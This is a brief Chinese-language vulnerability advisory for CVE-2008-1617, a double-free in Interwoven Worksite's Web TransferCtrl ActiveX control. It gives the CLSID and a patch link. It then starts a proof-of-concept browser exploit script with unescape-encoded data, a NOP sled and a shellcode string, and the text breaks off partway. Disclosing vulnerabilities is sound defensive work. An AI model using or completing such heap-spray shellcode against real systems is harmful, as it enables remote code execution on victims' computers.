BUGTRAQ ID: 28628
CVE(CAN) ID: CVE-2008-1617
Worksite是Interwoven发布的文档和邮件管理解决方案。
Worksite的iManFile.cab文件所安装的Web TransferCtrl Class ActiveX控件(CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307)在处理Server属性时存在双重释放漏洞。如果用户受骗访问了恶意站点的话,就可以触发这个漏洞,导致执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://worksitesupport.interwoven.com” target=“_blank”>http://worksitesupport.interwoven.com</a>
<script>
var data = unescape("%ud4b4%u0013")+unescape("%u1111%u1111");
var nop = unescape("%u9090");
var shellcode = "%uc033%u5050%u6a9